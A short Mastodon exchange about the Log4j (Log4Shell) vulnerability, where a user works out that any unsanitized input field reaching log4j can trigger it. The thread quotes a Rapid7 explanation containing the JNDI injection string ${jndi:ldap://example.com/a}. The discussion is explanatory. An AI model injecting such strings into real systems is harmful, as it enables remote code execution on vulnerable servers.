@TheGibson @rysiek I'm confused by the description, which makes it seem that you would have to run a configuration with LDAP lookup in active use.
From the screenshots in that github repo it seems it's possible to inject an arbitrary LDAP lookup configuration pointing to an attacker-controlled server into any input field that sends unsanitized data into log4j though?

Follow

@TheGibson @rysiek Answering myself: It's the latter.

rapid7.com/blog/post/2021/12/1

"The vulnerability resides in the way specially crafted log messages were handled by the Log4j processor. Untrusted strings (e.g. those coming from input text fields, such as web application search boxes) containing content like ${jndi:ldap://example.com/a} would trigger a remote class load, message lookup, and execution of the associated content if message lookup substitution was enabled."

Sign in to participate in the conversation
INFRa Mastodon

The social network of the future: No ads, no corporate surveillance, ethical design, and decentralization! Own your data with Mastodon!